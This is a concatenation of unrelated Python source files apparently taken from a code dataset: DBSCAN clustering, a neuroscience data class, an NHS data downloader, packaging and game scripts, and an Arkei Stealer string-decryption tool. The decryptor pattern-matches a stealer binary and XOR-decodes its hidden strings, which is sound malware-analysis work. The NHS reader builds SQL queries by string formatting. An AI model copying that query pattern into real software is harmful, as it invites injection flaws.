min_samples=4).fit(wordvecs)\n db_labels = db_model.labels_\n n_clusters = len(set(db_labels)) - (1 if -1 in db_labels else 0)\n print('聚类的类别数目(噪音类除外):%d' % n_clusters)\n ratio = len(db_labels[db_labels[:] == -1]) / len(db_labels)\n print('噪音率:' + str(ratio))\n clusters = get_DBSCAN_clusters(wordvecs, db_labels)\n centers = get_centers(clusters)\n test_vectors = get_vectors('../data/SemEval2010/train_removed/C-41.txt', word2ind, wordvecs, wordvecs.shape[1])\n most_label = get_most_label(test_vectors, clusters)\n vector_distance = distance_sort(test_vectors, centers[most_label], 'ED')\n top_k = 0\n # for vector in vector_distance:\n # for cur_index in range(len(wordvecs)):\n # if wordvecs[cur_index] ==\n # cur_index = vec2ind[vector]\n # cur_word = wordvecs[cur_index]\n # top_k += 1\n # print('%d、%s' % (top_k, cur_word))\n # if top_k >= 10:\n # break\n\n\n\n\n # sorted_distance_dict = distance_sort(clusters[label], centers[label], 'ED') # or cos\n\n embedding_file.close()\n\n\n\n\nif __name__ == '__main__':\n main()\n # get_vectors('../data/SemEval2010/train_removed/C-41.txt')\n # tsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000, method='exact')\n # low_dim_embs = tsne.fit_transform(vectors)\n # # low_dim_embs = tsne.fit_transform(vectors[:plot_only, :])\n # print(low_dim_embs.shape)\n # labels = [words[i] for i in range(vectors.shape[0])]\n # plot_with_labels(low_dim_embs, db_labels, labels, '../data/DBSCAN_SE2010.png')\n # embedding_file.close()\n\n # X1, y1=datasets.make_circles(n_samples=5000, factor=.6,\n # noise=.05)\n # X2, y2 = datasets.make_blobs(n_samples=1000, n_features=2, centers=[[1.2,1.2]], cluster_std=[[.1]],\n # random_state=9)\n # X = np.concatenate((X1, X2))\n # y_pred = [-1 for i in range(6000)]\n # plt.scatter(X[:, 0], X[:, 1], marker='o',c=y_pred)\n # plt.show()\n # y_pred = KMeans(n_clusters=3, random_state=9).fit_predict(X)\n # y_pred = DBSCAN(eps=0.1, min_samples=10).fit_predict(X)\n # print(y_pred.shape)\n # n_clusters_ = len(set(y_pred)) - (1 if -1 in y_pred else 0)\n # print('聚类的类别数目:%d' % (n_clusters_))\n # ratio = len(y_pred[y_pred[:] == -1]) / len(y_pred)\n # print('认为是噪音的数据比例:%d' % (ratio))\n # plt.scatter(X[:, 0], X[:, 1], c=y_pred)\n # plt.show()\n\n","repo_name":"NoteXYX/KeywordExtraction","sub_path":"useless/dbscan.py","file_name":"dbscan.py","file_ext":"py","file_size_in_byte":7214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1553238593","text":"import pandas as pd\nimport numpy as np\nimport os\nimport glob\nimport matplotlib.pyplot as plt\nfrom utils.processSuite2pOutput import correct_suite2p_outputs\n\n\nclass Run:\n\n def __init__(self, summary, exp_id):\n self.fishID = summary.fishlabel[exp_id]\n self.runID = summary.run[exp_id]\n self.date = summary.date[exp_id]\n self.calciumIndicator = summary.date[exp_id]\n self.stage = summary.stage[exp_id]\n self.enucleated = summary.enucleated[exp_id]\n self.frameRateSCAPE = summary.frameRateSCAPE[exp_id]\n self.frameRateBeh = summary.frameRateBeh[exp_id]\n self.laserPower = summary.laserPower[exp_id]\n self.suite2pAnalysis = summary.suite2pAnalysis[exp_id]\n self.suite2pPath = summary.suite2pPath[exp_id]\n self.savePath = summary.savePath[exp_id]\n self.bad_frames = [int(i) for i in summary.bad_frames[exp_id].split(',')]\n\n self.nPlanesAnalysed = np.nan\n self.suite2pData = dict()\n\n def load_behavior_df(self):\n df_bout = pd.read_pickle(self.savePath + '/df_bout.pkl')\n df_frame = pd.read_pickle(self.savePath + '/df_frame.pkl')\n\n return df_bout, df_frame\n\n def load_suite2p_outputs(self):\n if self.suite2pAnalysis:\n\n planesAnalysed = next(os.walk(self.suite2pPath))[1]\n\n for i in planesAnalysed:\n try:\n self.suite2pData[int(i)] = dict()\n except ValueError:\n i = i.split('_')[-1]\n try:\n self.suite2pData[int(i)]['F'] = np.load(self.suite2pPath + i + '/suite2p/plane0/F.npy',\n allow_pickle=True)\n self.suite2pData[int(i)]['Fneu'] = np.load(self.suite2pPath + i +\n '/suite2p/plane0/Fneu.npy', allow_pickle=True)\n self.suite2pData[int(i)]['spks'] = np.load(self.suite2pPath + i +\n '/suite2p/plane0/spks.npy', allow_pickle=True)\n self.suite2pData[int(i)]['stat'] = np.load(self.suite2pPath + i +\n '/suite2p/plane0/stat.npy', allow_pickle=True)\n ops = np.load(self.suite2pPath + i + '/suite2p/plane0/ops.npy', allow_pickle=True)\n self.suite2pData[int(i)]['ops'] = ops.item()\n self.suite2pData[int(i)]['iscell'] = np.load(self.suite2pPath + i +\n '/suite2p/plane0/iscell.npy', allow_pickle=True)\n print('succesfully loaded suite2p outputs for plane {} at location\\n{}'.format(i,\n self.suite2pPath + i))\n\n if not hasattr(self, 'nFramesSCAPE'):\n setattr(self, 'nFramesSCAPE', self.suite2pData[int(i)]['F'].shape[1])\n\n except FileNotFoundError:\n print('No outputs found at this path:\\n')\n print(self.suite2pPath + i)\n self.suite2pData[int(i)] = None\n\n else:\n print('No suite2p analysis set for this run.')\n self.suite2pData = None\n\n def correct_suite2p_outputs(self, plane):\n\n F_corrected, cells = correct_suite2p_outputs(self.suite2pData[plane]['F'],\n self.suite2pData[plane]['iscell'],\n self.suite2pData[plane]['Fneu'])\n self.suite2pData[plane]['F_corrected'] = F_corrected\n self.suite2pData[plane]['cells'] = cells\n\n def filter_f(self, plane, window=3):\n filtered_f = np.zeros(self.suite2pData[plane]['F_corrected'].shape)\n for cell in self.suite2pData[plane]['cells']:\n trace = pd.Series(self.suite2pData[plane]['F_corrected'][cell])\n filtered_f[cell,] = np.array(trace.interpolate().rolling(window=window, center=True).median())\n self.suite2pData[plane]['F_corrected_filter'] = filtered_f\n\n def define_midline_per_plane(self):\n planes = list(self.suite2pData.keys()).copy()\n planes.sort()\n setattr(self, 'midline_lim', {})\n for plane in planes:\n plt.figure(figsize=(14, 10))\n plt.title(plane)\n vmax = np.percentile(self.suite2pData[plane]['ops']['meanImg'], 90)\n plt.imshow(self.suite2pData[plane]['ops']['meanImg'], cmap='Greys', vmax=vmax)\n try:\n plt.plot([lim1[0], lim2[0]], [lim1[1], lim2[1]], '--o')\n except UnboundLocalError:\n pass\n lim1, lim2 = plt.ginput(2)\n self.midline_lim[plane] = (lim1, lim2)\n plt.close()\n\n def build_mean_image(self):\n planes = list(self.suite2pData.keys()).copy()\n planes.sort()\n limits_crop = self.limits_crop\n lim_sup = np.max(limits_crop['x_lim'])\n y_size = self.suite2pData[planes[0]]['ops']['meanImg'].shape[1]\n arrays = np.zeros((lim_sup, y_size, len(planes)))\n for i, plane in enumerate(planes):\n lims = list(limits_crop.loc[limits_crop['Unnamed: 0'] == plane, 'x_lim'])\n arrays[lims[0]:lims[1], :, i] = self.suite2pData[plane]['ops']['meanImg']\n output = np.mean(arrays, axis=2)\n setattr(self, 'mean_background', output)\n\n # def build_mean_image_sagittal(self):\n # planes = list(self.suite2pData.keys()).copy()\n # planes.sort()\n # limits_crop = self.limits_crop\n # lim_sup = np.max(limits_crop['x_lim'])\n # y_size = self.suite2pData[planes[0]]['ops']['meanImg'].shape[1]\n # arrays = np.zeros((lim_sup, y_size, len(planes)))\n # for i, plane in enumerate(planes):\n # lims = list(limits_crop.loc[limits_crop['Unnamed: 0'] == plane, 'x_lim'])\n # arrays[lims[0]:lims[1], :, i] = self.suite2pData[plane]['ops']['meanImg']\n # output = np.mean(arrays, axis=1)\n # setattr(self, 'mean_background', output)\n\n def assign_behavior_trace(self, df_frame):\n setattr(self, 'tail_angle', np.array(df_frame.Tail_angle).copy())\n\n def assign_time_indices(self):\n setattr(self, 'time_indices_bh', np.arange(len(self.tail_angle)) / self.frameRateBeh)\n setattr(self, 'time_indices_SCAPE', np.arange(self.nFramesSCAPE) / self.frameRateSCAPE)\n","repo_name":"wyartlab/Carbo-Tano_Lapoix_2023","sub_path":"SCAPE/utils/createExpClass.py","file_name":"createExpClass.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26361263251","text":"from binascii import hexlify, unhexlify\nimport pefile\nimport regex as re\nimport argparse\nimport logging\nimport traceback\nimport os\n\ndef configure_logger(log_level):\n log_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'arkei_decrypt.log')\n log_levels = {0: logging.ERROR, 1: logging.WARNING, 2: logging.INFO, 3: logging.DEBUG}\n log_level = min(max(log_level, 0), 3) #clamp to 0-3 inclusive\n logging.basicConfig(level=log_levels[log_level], \n format='%(asctime)s - %(name)s - %(levelname)-8s %(message)s',\n handlers=[\n logging.FileHandler(log_file, 'a'),\n logging.StreamHandler()\n ])\n\nclass Decryptor:\n \n def __init__(self, input_file, output_file=None):\n self.logger = logging.getLogger('Arkei Stealer String Decryptor Logger')\n self.input_file = input_file\n self.output_file = output_file\n self.regex = re.compile(rb'(\\x6A(?P.))(\\x68(?P....))(\\x68(?P....))', re.DOTALL)\n self.output_strings = []\n with open(self.input_file, 'rb') as fp:\n self.data = fp.read()\n\n def extract_key_ciphertext(self, key_addr, ciphertext_addr, ciphertext_length):\n \"\"\"\n Extract key and ciphertext and return\n \"\"\"\n key_addr = int.from_bytes(key_addr, \"big\")\n ciphertext_addr = int.from_bytes(ciphertext_addr, \"big\")\n ciphertext_length = int.from_bytes(ciphertext_length, \"big\")\n\n # PE File\n pe = pefile.PE(self.input_file, fast_load=False)\n # Extract Key Addr\n key_ptr = pe.get_offset_from_rva(key_addr - pe.OPTIONAL_HEADER.ImageBase)\n self.logger.debug(f'Found potential key ptr at {hex(key_ptr)}')\n # Extract Ciphertext Addr\n ct_ptr = pe.get_offset_from_rva(ciphertext_addr - pe.OPTIONAL_HEADER.ImageBase)\n self.logger.debug(f'Found potential ciphertext ptr at {hex(ct_ptr)}') \n\n # Extract key and ciphertext from ptr\n with open(self.input_file, 'rb') as fp:\n fp.seek(key_ptr, 0)\n key = fp.read(ciphertext_length)\n self.logger.debug(f'Found key: {hexlify(key)}')\n fp.seek(ct_ptr, 0)\n ciphertext = fp.read(ciphertext_length)\n self.logger.debug(f'Found ciphertext: {hexlify(ciphertext)}')\n return key, ciphertext\n\n def extract_strings(self):\n \"\"\"\n Extract ciphertext (hashes) and keys and perform decryption of strings in Arkei Stealer\n \"\"\"\n\n matches = list(self.regex.finditer(self.data))\n #print(matches)\n for match in matches:\n if not match.group('key'):\n self.logger.warning(f'No key: {match.groupdict()}')\n continue\n match_data = self.data[match.start():match.end()]\n # Extract Ciphertext Length\n ciphertext_length = bytes(reversed(match.group('len')))\n # Extract Key Addr\n key_addr = bytes(reversed(match.group('key')))\n # Extract Ciphertext Addr\n ciphertext_addr = bytes(reversed(match.group('ciphertext')))\n key, ciphertext = self.extract_key_ciphertext(key_addr, ciphertext_addr, ciphertext_length)\n \n # Xor Decrypt\n buf = bytearray(ciphertext)\n key = bytearray(key)\n for i in range(len(buf)):\n buf[i] ^= key[i%len(key)]\n try:\n print(buf.decode('ascii'))\n self.output_strings.append(buf.decode('ascii'))\n except:\n print(buf)\n self.output_strings.append(buf)\n continue\n\n def write_output(self):\n #Write output to a given file\n try:\n with open(self.output_file, 'w') as fp:\n for x in self.output_strings:\n fp.write(str(x))\n fp.write('\\n')\n except Exception as e:\n self.logger.critical(traceback.format_exc())\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Arkei Stealer String Decryptor')\n parser.add_argument('-f', '--file', action='store', dest='file',\n required=True, help='Path of file to decrypt strings')\n parser.add_argument('-o', '--outfile', action='store', dest='outfile',\n required=False, help='Path to write unpacked strings')\n parser.add_argument('-v', '--verbose', action='count', default=0, \n help='Increase verbosity. Can specify multiple times for more verbose output')\n args = parser.parse_args()\n configure_logger(args.verbose)\n decryptor = Decryptor(args.file, args.outfile)\n try:\n decryptor.extract_strings()\n if args.outfile:\n decryptor.write_output()\n except Exception as e:\n print(f'Exception processing {args.file}:')\n print(traceback.format_exc())\n \n","repo_name":"MuziSec/malware_scripts","sub_path":"arkei_stealer/decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"15611283673","text":"# Based on https://github.com/pydata/pandas-datareader/blob/master/pandas_datareader/wb.py\n\nimport warnings\n\nimport sqlite3\n\nimport pandas as pd\nimport numpy as np\n\nfrom pandas_datareader.base import _BaseReader\n# from pandas.compat import string_types\nfrom pandas import read_sql_query, DataFrame, read_csv\n\nimport requests\nimport lxml.html\nimport lxml.etree\n\nimport zipfile\n#The following fudge copes with Python 2 and Python 3\ntry:\n from StringIO import StringIO as zreader\nexcept ImportError:\n from io import BytesIO as zreader\n\nimport json\n\n#Need unique column names\n#https://stackoverflow.com/a/2837551/454773\ndef rename_duplicates( old ):\n seen = {}\n for x in old:\n if x in seen:\n seen[x] += 1\n yield \"%s_%d\" % (x, seen[x])\n else:\n seen[x] = 0\n yield x\n\n# This list of dataset codes was pulled from the NHS Digital Organisation\n# Data Service data downloads pages:\n# https://digital.nhs.uk/organisation-data-service/data-downloads\n\ndataset_codes = ['epraccur', 'etrust', 'eccg', 'eccgsite', 'epcmem', 'epracmem',\n 'egdpprac', 'egpcur', 'egparc', 'epracarc', 'ehospice',\n 'epharmacyhq', 'edispensary', 'enurse', 'epcdp', 'eabeydispgp',\n 'ecarehomehq', 'ecarehomesite', 'ecarehomesucc', 'ephp',\n 'ephpsite', 'enonnhs', 'eprison', 'eschools', 'ejustice',\n 'ecare']\ndatatype_codes = ['gp-data', 'other-nhs', 'health-authorities',\n 'non-nhs', 'miscellaneous']\n\nimport pkg_resources\n\nJSON_FILE = pkg_resources.resource_filename('pd_datareader_nhs', 'data/nhsdigitalods.json')\njdata=json.load(open(JSON_FILE))\n\n\nclass NHSDigitalOrganisationDataServiceReader(_BaseReader):\n \"\"\"\n Download data series from NHS Digital's Organisation Data Service\n \n Parameters\n ----------\n datasets: NHS Digital ODS indicator string or list of strings\n taken from the filepath of the downloaded dataset.\n errors: str {'ignore', 'warn', 'raise'}, default 'warn'\n Country codes are validated against a hardcoded list. This controls\n the outcome of that validation, and attempts to also apply\n to the results from world bank.\n errors='raise', will raise a ValueError on a bad country code.\n \n Returns\n -------\n ``pandas`` DataFrame.\n \"\"\"\n \n def __init__(self, datasets=None, datatypes=None, sqlite3db='default.sqlite', errors='warn'):\n \n if datasets is None and datatypes is None:\n datatypes = datatype_codes\n \n if isinstance(datatypes, str):\n datatypes = [datatypes]\n if isinstance(datasets, str):\n datasets = [datasets]\n \n bad_datasets = np.setdiff1d(datasets, dataset_codes) if datasets is not None else []\n # Validate the input\n if len(bad_datasets) > 0:\n tmp = \", \".join(bad_datasets)\n if errors == 'raise':\n raise ValueError(\"Invalid dataset code(s): %s\" % tmp)\n if errors == 'warn':\n warnings.warn('Non-standard dataset '\n 'codes: %s' % tmp, UserWarning)\n \n bad_datatypes = np.setdiff1d(datatypes, datatype_codes) if datatypes is not None else []\n # Validate the input\n if len(bad_datatypes) > 0:\n tmp = \", \".join(bad_datatypes)\n if errors == 'raise':\n raise ValueError(\"Invalid datatype code(s): %s\" % tmp)\n if errors == 'warn':\n warnings.warn('Non-standard datatype '\n 'codes: %s' % tmp, UserWarning)\n\n self.datasets = datasets\n self.datatypes = datatypes\n self.errors = errors\n \n self._cached_datasets = {}\n self._cached_dataset_lookups = None\n \n self.dbname = sqlite3db\n if sqlite3db:\n self.sqlite3con = sqlite3.connect(self.dbname) \n self._setdb()\n \n self._sourceDatasets(False)\n \n def init(self):\n pass\n \n def _setdb(self):\n if self.sqlite3con and not self._dbtable_exists('dataset_date'):\n print(\"Setting up a new dataset_date table...\")\n DataFrame({'Dataset':dataset_codes,'Date':None}).to_sql(con=self.sqlite3con,\n name=\"dataset_date\",\n index=False)\n if isinstance(self._cached_dataset_lookups, DataFrame):\n self._updatedb('_cached_dataset_lookups', self._cached_dataset_lookups)\n for key in self._cached_datasets:\n self._updatedb(key, self._cached_datasets[key]) \n \n def _sourceDatasets(self, retval=True):\n lookupURLs=[\"https://digital.nhs.uk/services/organisation-data-service/data-downloads/gp-and-gp-practice-related-data\",\n \"https://digital.nhs.uk/services/organisation-data-service/data-downloads/other-nhs-organisations\",\n \"https://digital.nhs.uk/services/organisation-data-service/data-downloads/health-authorities-and-support-agencies\",\n \"https://digital.nhs.uk/services/organisation-data-service/data-downloads/non-nhs-organisations\",\n \"https://digital.nhs.uk/services/organisation-data-service/data-downloads/miscellaneous\"]\n \n data = DataFrame()\n\n for url in lookupURLs:\n #print(f'Looking up {url}...')\n # TO DO - should really handle exception better here, eg if there is no connection?\n try:\n txt=requests.get(url).text \n table = lxml.html.fromstring(txt)\n\n for row in table.xpath('//tr')[1:]:\n cells=row.xpath('td')\n if cells[1] is not None:\n dataURL=cells[1].xpath('a/@href')[0]\n #File contents\tFile\tDate uploaded\tQuarterly/Monthly\tAvailable in XML\tRole code\tAPI call\n data=pd.concat([data, DataFrame([{'Label':cells[0].text,\n 'Date':cells[2].text,\n 'Period':cells[3].text,\n 'Dataset':dataURL.split('/')[-1].split('.')[0],\n 'URL':dataURL,\n 'Type':url.split('/')[-1]}])])\n data = data.reset_index(drop=True)\n except:\n if self._dbtable_exists('_cached_dataset_lookups'):\n data = self.read_db(table = '_cached_dataset_lookups')\n else: warnings.warn(\"Couldn't scrape ODS data listing: {}\".format(url))\n \n # cache\n self._cached_dataset_lookups = data.copy()\n if self.sqlite3con and not self._dbtable_exists('_cached_dataset_lookups'):\n self._updatedb('_cached_dataset_lookups', self._cached_dataset_lookups)\n if not retval: return\n return data\n\n def get_datasets(self):\n \"\"\"Download information about all NHS Digital Organisation Data Service datasets\"\"\"\n \n if isinstance(self._cached_dataset_lookups, DataFrame):\n return self._cached_dataset_lookups.copy()\n return self._sourceDatasets()\n \n def search(self, string='GP', field='Dataset', case=False):\n \"\"\"\n Search available datasets from NHS Digital Organisation Data Service\n Parameters\n ----------\n string: string\n regular expression\n field: string\n Label, Period, Dataset, Type, Date\n See notes below\n case: bool\n case sensitive search?\n Notes\n -----\n The first time this function is run it will download and cache the full\n list of available datasets. Depending on the speed of your network\n connection, this can take time. Subsequent searches will use the cached\n copy, so they should be much faster.\n Label : code label for dataset\n Period: reporting period\n Dataset: title of dataset\n Date: reporting date\n Type: general category dataset is listed under\n \"\"\"\n datasets = self.get_datasets()\n data = datasets[field]\n idx = data.str.contains(string, case=case)\n out = datasets.loc[idx].dropna()\n return out\n\n def zipgrabber(self, url):\n ''' Grab a zip file from a URL '''\n r = requests.get(url)\n z = zipfile.ZipFile(zreader(r.content))\n return z\n\n def zipgrabberfile(self, url, f):\n ''' Grab a file by name from a zip file grabbed from a URL '''\n return self.zipgrabber(url).open(f)\n\n def zipfile(self, z, f):\n ''' Grab a file by name from an already grabbed zip file '''\n return z.open(f)\n\n def zipfilelist(self, z):\n ''' Return the names of files contained in a grabbed zip file '''\n return z.namelist()\n \n def read_db(self, q=None, table=None):\n return self._read_db(q, table)\n \n def _read_db(self, q=None, table=None):\n #Note that the db can be stale - should check against recently loaded _cached_dataset_lookups?\n if not self.sqlite3con: return DataFrame()\n if q is None and table is None:\n q=\"SELECT name FROM sqlite_master WHERE type='table'\"\n elif q is None:\n q=\"SELECT * FROM {tbl}\".format(tbl=table)\n return read_sql_query(q,self.sqlite3con)\n \n def _checkdbcopyiscurrent(self,table):\n if table !='_cached_dataset_lookups' and self._dbtable_exists(table):\n datadate = self._cached_dataset_lookups[self._cached_dataset_lookups['Dataset']==table].iloc[0]['Date']\n q=\"SELECT Date FROM dataset_date WHERE Dataset='{dataset}';\".format(dataset=table)\n dbdatadate=self.read_db(q).iloc[0]['Date']\n return datadate==dbdatadate\n return False\n \n def _updatedb(self,table=None, data=None):\n if not self.sqlite3con or not isinstance(data,DataFrame) or table is None: return\n con=self.sqlite3con\n data.to_sql(con=con, name=table, if_exists='replace',index=False)\n if table !='_cached_dataset_lookups' and table!='dataset_date':\n datadate=self._cached_dataset_lookups[self._cached_dataset_lookups['Dataset']==table].iloc[0]['Date']\n q=\"UPDATE dataset_date SET Date='{date}' WHERE Dataset='{dataset}';\".format(date=datadate, dataset=table)\n c = con.cursor()\n c.execute(q)\n con.commit()\n \n def _dbtable_exists(self,table=None):\n if not self.sqlite3con or table is None: return False\n q=\"SELECT name FROM sqlite_master WHERE type='table' AND name='{}'\".format(table)\n return True if len(self.read_db(q)) else False\n \n def cached(self):\n tmp=self.search(string='')\n return tmp[tmp['Dataset'].isin(self._cached_datasets.keys())]\n\n \n def read(self):\n return self._read()\n\n def _read(self):\n \n data = {}\n \n #Get a list of datasets for a particular datatype\n if self.datasets is None and self.datatypes is not None:\n datasets = []\n for dt in self.datatypes:\n datasets = datasets + self._cached_dataset_lookups[self._cached_dataset_lookups['Type']==dt]['Dataset'].tolist()\n self.datasets = [ds for ds in datasets if ds in dataset_codes ]\n \n for dataset in self.datasets:\n #Use a pre-existing copy of the dataset if we have one\n if dataset in self._cached_datasets:\n data[dataset] = self._cached_datasets[dataset]\n continue\n elif self._dbtable_exists(dataset):\n #if we have a recent copy, use it\n if self._checkdbcopyiscurrent(dataset):\n data[dataset] = self.read_db(table=dataset)\n continue\n \n # Build URL for API call\n try:\n url=self._cached_dataset_lookups[self._cached_dataset_lookups['Dataset']==dataset].iloc[0]['URL']\n \n #Should trap as a warning\n if dataset not in jdata: return DataFrame()\n \n names=list(rename_duplicates(jdata[dataset]['cols']))\n dates=jdata[dataset]['dates']\n codes=jdata[dataset]['codes']\n index=jdata[dataset]['index']\n \n #Try to guess cols to cast as dates\n if dates=='auto':\n dates=[names.index(c) for c in names if 'date' in c.lower()]\n\n #Try to guess columns that should be classed as string not int\n dtypes={c:str for c in names\n if \"phone\" in c.lower() or \" code\" in c.lower() or \"type\" in c.lower()}\n\n df = read_csv(self.zipgrabberfile(url, '{}.csv'.format(dataset)),\n header=None, names=None if names==[] else names, parse_dates=dates,\n low_memory=False, encoding='Latin-1')\n \n for c in df.columns:\n if c.startswith('Null') : df.drop(c, axis=1, inplace=True)\n if codes is not None:\n for col in codes:\n df[col + ' Value']=df[col].astype(str).map(codes[col])\n #The db table writer ignores the index...\n #if index=='auto':\n # index=[names[0]]\n #if index is not None: df=df.set_index(index)\n\n if dataset not in self._cached_datasets: self._cached_datasets[dataset]=df\n self._updatedb(dataset, df)\n data[dataset]=df\n\n except ValueError as e:\n msg = str(e) + ' dataset: ' + dataset\n if self.errors == 'raise':\n raise ValueError(msg)\n elif self.errors == 'warn':\n warnings.warn(msg)\n\n # Confirm we actually got some data, and build Dataframe\n if len(data) > 1:\n return data\n elif len(data) == 1:\n return data[list(data)[0]]\n else:\n msg = \"No datasets returned data.\"\n raise ValueError(msg)\n\n\ndef download(dataset=None, datatype=None,\n errors='warn', sqlite3db=None, **kwargs):\n \"\"\"\n Download datasets from NHS Digital Organisation Data Service\n \n Parameters\n ----------\n dataset: string or list of strings\n taken from the dataset codes in dataset URLs\n datatype: string or list of strings\n taken from the data collection page\n errors: str {'ignore', 'warn', 'raise'}, default 'warn'\n Dataset and datatype codes are validated against a hardcoded list. This controls\n the outcome of that validation.\n errors='raise', will raise a ValueError on a bad dataset or datatype code.\n kwargs:\n keywords passed to NHSDigitalOrganisationDataServiceReader\n Returns\n -------\n ``pandas`` DataFrame with columns: country, iso_code, year,\n indicator value.\n \"\"\"\n return NHSDigitalOrganisationDataServiceReader(datasets=dataset, datatypes=datatype,\n sqlite3db=sqlite3db,\n **kwargs).read()\n\ndef search(string='GP', field='Dataset', case=False, **kwargs):\n \"\"\"\n Search available datasets from NHS Digital Organisation Data Service\n Parameters\n ----------\n string: string\n regular expression\n field: string\n Label, Period, Dataset, Type, Date\n See notes below\n case: bool\n case sensitive search?\n Notes\n -----\n The first time this function is run it will download and cache the full\n list of available datasets. Depending on the speed of your network\n connection, this can take time. Subsequent searches will use the cached\n copy, so they should be much faster.\n Label : code label for dataset\n Period: reporting period\n Dataset: title of dataset\n Date: reporting date\n Type: general category dataset is listed under\n \"\"\"\n\n return NHSDigitalOrganisationDataServiceReader(**kwargs).search(string=string, field=field,\n case=case)\ndef setdb(sqlite3db='default.sqlite', **kwargs):\n '''\n Enable a db.\n '''\n NHSDigitalOrganisationDataServiceReader(sqlite3db=sqlite3db, **kwargs).setdb()\n\ndef updatedb(sqlite3db='default.sqlite', tables=\"all\",**kwargs):\n \"\"\"\n Populate the SQLite3 database. This may take some time.\n \"\"\"\n datasets=None\n datatypes=None\n if isinstance(tables, str):\n if tables=='all':\n datasets=dataset_codes\n elif tables in dataset_codes: datasets = [tables]\n elif tables in datatype_codes: datatypes = [tables]\n elif isinstance(tables, list):\n for table in tables:\n if table in dataset_codes: datasets.append(table)\n elif table in datatype_codes: datatypes.append(table)\n download(dataset=datasets, datatype=datatypes, sqlite3db=sqlite3db, **kwargs)\n\ndef availableDatasets(typ=\"offline\", **kwargs):\n if typ==\"offline\":\n return NHSDigitalOrganisationDataServiceReader().read_db(q='SELECT * FROM dataset_date WHERE Date!=\"None\"')\n return NHSDigitalOrganisationDataServiceReader().cached()\n\ndef init(sqlite3db=None,**kwargs):\n NHSDigitalOrganisationDataServiceReader(sqlite3db=sqlite3db, **kwargs).init()\n\n\n","repo_name":"ouseful-datasupply/python-pandas-datareader-NHSDigital","sub_path":"pd_datareader_nhs/nhs_digital_ods.py","file_name":"nhs_digital_ods.py","file_ext":"py","file_size_in_byte":17780,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"6755601926","text":"try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='pyOpenCGA',\n version='0.8',\n description='A REST client for OpenCGA web services',\n long_description=long_description,\n long_description_content_type='text/x-rst',\n packages=['pyopencga', 'pyopencga.Utils', 'pyopencga.rest_clients'],\n license='Apache Software License',\n author='David Gomez-Peregrina',\n author_email='david.gomez@mgviz.org',\n keywords='opencb opencga bioinformatics genomic database',\n install_requires=[\n 'pip >= 7.1.2',\n 'requests >= 2.7',\n 'avro == 1.7.7',\n 'pathlib >= 1.0.1',\n 'requests_toolbelt >= 0.7.0',\n 'pyyaml',\n 'retrying'\n ],\n project_urls={\n 'Documentation': 'http://docs.opencb.org/display/opencga/RESTful+Web+Services+and+Clients',\n 'Source': 'https://github.com/opencb/opencga/tree/develop/opencga-client/src/main/python',\n 'OpenCGA': 'https://github.com/opencb/opencga',\n 'OpenCGA Documentation': 'http://docs.opencb.org/display/opencga',\n 'Bug Reports': 'https://github.com/opencb/opencga/issues',\n }\n)\n\n","repo_name":"rgiffen/opencga","sub_path":"opencga-client/src/main/python/pyOpenCGA/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"11379762945","text":"\"\"\"\nRunning the game with different agents\n\"\"\"\nfrom agent import (\n ReflexiveHierarchicalAgent, PlanningTwoMovesHierarchicalAgent, ProbabilisticPlanningHierarchicalAgent,\n LimitedProbabilisticPlanningHierarchicalAgent\n)\nfrom features import FringeSmoothness, HoleCount, EmptyRowsCount, AverageHeight\nfrom tetris import Game\nfrom utility import Utility\nfrom world import Config\n\n\ndef run_game():\n game = Game(Config())\n utility = Utility(\n [FringeSmoothness(), HoleCount(), EmptyRowsCount(), AverageHeight()],\n [3.2375932, 14.10950807, 22.32253916, 30.96122022]\n )\n # game.run_agent(ProbabilisticPlanningHierarchicalAgent(utility))\n game.run_agent(LimitedProbabilisticPlanningHierarchicalAgent(utility))\n # game.run_agent(PlanningOneMoveHierarchicalAgent(utility))\n # game.run_agent(ReflexiveHierarchicalAgent(utility))\n\n\nif __name__ == '__main__':\n run_game()","repo_name":"alexgorin/tetrisai","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42945686394","text":"import numpy as np\nimport sys\nimport os\nimport math\nimport subprocess\nimport re\nimport time\nimport copy\nimport abmptools as ampt\n# Matrix operation\n\n\nif __name__ == \"__main__\":\n ## -- user setting --\n # read info\n mode = 'resnum' #rfile, resnum\n calcmode = 'id-id' #molpair, id, id-id\n step = 1.0\n assignmolname = False\n refreshatmtype = False\n\n # tgtmol = 2\n tgt1 = '000'\n tgt2 = '000'\n ## -- setting end --\n\n centermolid = 20\n tgtmol = '000'\n # main\n argvs = sys.argv\n # fname = str(argvs[1])\n\n if calcmode == 'molpair':\n ofile= 'dist-' + tgt1 + '-' + tgt2 + '.txt'\n o2file= 'hist-' + tgt1 + '-' + tgt2 + '.txt'\n o3file= 'rdf-' + tgt1 + '-' + tgt2 + '.txt'\n\n if calcmode == 'id':\n ofile= 'dist-mol' + str(centermolid) + '-' + tgtmol + '.txt'\n o2file= 'hist-mol' + str(centermolid) + '-' + tgtmol + '.txt'\n o3file= 'rdf-mol' + str(centermolid) + '-' + tgtmol + '.txt'\n\n if calcmode == 'id-id':\n id1 = int(argvs[2])\n id2 = int(argvs[3])\n # print(id1, id2)\n\n for arg in argvs:\n if arg == '--move':\n moveflag == True\n if arg == '--nomove':\n moveflag == False\n\n for ii in range(len(argvs)):\n if ii == 0:\n continue\n if argvs[ii][0:2] == '--':\n continue\n fname = 